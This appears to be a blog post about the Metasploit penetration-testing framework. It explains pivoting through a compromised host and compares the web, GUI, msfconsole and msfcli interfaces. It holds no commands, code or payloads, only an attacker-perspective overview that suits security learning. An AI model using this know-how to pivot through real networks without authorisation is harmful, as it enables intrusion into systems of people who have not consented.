There are two aspects to Metasploit that I would like to cover today. The first is pivoting, a topic I mentioned in a previous post, and the second is the way a user interfaces with Metasploit. Pivoting allows an attacker to use a compromised system to attack other systems on the same network. For example, an attacker compromises a web server on a corporate network, the attacker can then use the compromised web server to attack other systems on the network.
Pivoting is a powerful tool that allows Metasploit to penetrate deep into a network. Core Security’s Core Impact and Immunity Inc.’s CANVAS have this feature as well. The Metasploit version of pivoting is not quite as clean as Core Impact but for the price, free, it works well enough. Of all of the payloads included in Metasploit, the only one which supports pivoting in Metasploit is the Meterpreter.
Metasploit has a few interfaces which can be used when attacking a system. The Metasploit framework provides a web interface, a GUI, the msfconsole and the msfcli. For those who are new to Metasploit, the web interface is the simplest way to get comfortable with the layout.
- The Metasploit GUI, shown below, is similar in function to the web interface, though less polished. The attacker can search for and select an exploit, chose a payload, set the option and run the exploit without much knowledge of the underlying commands necessary to run Metasploit. The current GUI is no longer supported but there is a new GUI provided with Metasploit Express which is a product sold by Rapid7.
- The msfconsole is a very powerful interface to Metasploit and it is the most often used interface. Typically an attacker will use the basic options, selecting an exploit, a payload and the options. There are many other commands that can be run from the msfconsole but they are beyond the scope of this article.
- The msfcli is run from the command line. The attacker sets all arguments on the command line and executes the command. A shell, Meterpreter shell or VNC window will spawn after the exploit has been performed.
In my next installment, I’ll show an exploit I wrote for an application and how it can be leveraged in an attack.